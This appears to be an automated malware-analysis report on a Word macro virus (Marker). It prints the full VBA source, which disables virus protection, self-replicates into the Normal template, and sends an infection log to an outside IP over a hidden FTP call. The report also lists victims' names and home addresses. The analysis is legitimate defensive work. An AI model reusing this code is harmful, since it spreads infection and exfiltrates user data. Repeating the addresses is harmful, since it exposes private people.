MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains VBA macros that are designed to disable macro protection and self-replicate. The script attempts to download a second-stage payload from the IP address 209.201.88.110 and save it as 'c:\netldx.vxd'. This indicates a downloader or droppper functionality, likely delivered via spearphishing.
Heuristics 6
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
'Switch the VirusProtection OFF Options.VirusProtection = False -
Callback phishing phone lure medium SE_CALLBACK_LUREDocument asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.lifestyleinc.net In document text (OLE body)
- http://www.co.fillmore.mn.us/In document text (OLE body)
- http://www.chatfieldpublicschools.net/In document text (OLE body)
- http://agency.governmentjobs.com/mnmeritsystem/default.cfmIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5991 bytes |
SHA-256: b81978d107ce7feff5299df4a9a2e516260a18da6c24f11c4cb09e0a2385bab8 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'
' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'
' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'
' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'
' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'
' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'
' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'
' 11:58:16 AM - Wednesday, 17 Feb 1999
' Russell Hyzen
'
' 08:47:57 AM - Tuesday, 8 Jun 1999
' Josh Newman
'
' 09:00:07 AM - Monday, 21 Jun 1999
' John W. Albers, DVM
'
' 08:06:48 AM - Thursday, 1 Jul 1999
' MSC4
'
' 05:53:54 AM - Friday, 16 Jul 1999
' Rrogers
'
' 03:40:39 PM - Monday, 9 Aug 1999
' Beth Edwards
'
' 12:54:37 PM - Thursday, 2 Sep 1999
' Beth Edwards
'
' 11:00:11 AM - Tuesday, 14 Sep 1999
' Janice Trumpeter
'
' 05:50:48 AM - Saturday, 9 Oct 1999
' Pentium 2
' Nicole Armstrong
' 7178 S. Willa Lane
' Evergreen CO 80439-5652
' 02:21:46 PM - Monday, 15 Nov 1999
' Doug Armstrong
'
' 04:09:44 PM - Monday, 15 Nov 1999
' Chassy Wright
'
' 01:45:40 PM - Wednesday, 1 Mar 2000
' City of Spring Valley
'
' 01:29:14 PM - Friday, 3 Mar 2000
' David Phillips
'
' 10:54:46 PM - Thursday, 25 May 2000
' Melissa Vander Plas
'
' 04:01:24 PM - Thursday, 18 Jul 2002
' Mike
'
' 11:27:41 AM - Monday, 9 Dec 2002
' David Phillips
'
' 11:37:12 AM - Thursday, 27 Apr 2006
' Melissa Vander Plas
' Bluff Country Newspaper Group
'
' 07:15:08 PM - Tuesday, 25 Jul 2006
' Dave Phillips
'
' 09:12:06 AM - Wednesday, 16 May 2007
' David Philliips
' 808 Ford Ave.
' Spring Valley, MN 55975
' USA
' 09:49:21 AM - Friday, 18 May 2007
' Debby Groth
' 141 S. Broadway Ave.
' Spring Valley, MN 55975
' USA
' 03:00:00 PM - Monday, 11 Jun 2007
' Spring Valley Tribune
'
' 09:30:07 AM - Monday, 6 Aug 2007
' Spring Valley Tribune
'
' 08:37:14 AM - Monday, 17 Sep 2007
' Debby Groth
'
' 10:16:19 AM - Tuesday, 22 May 2012
' Debby Groth
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.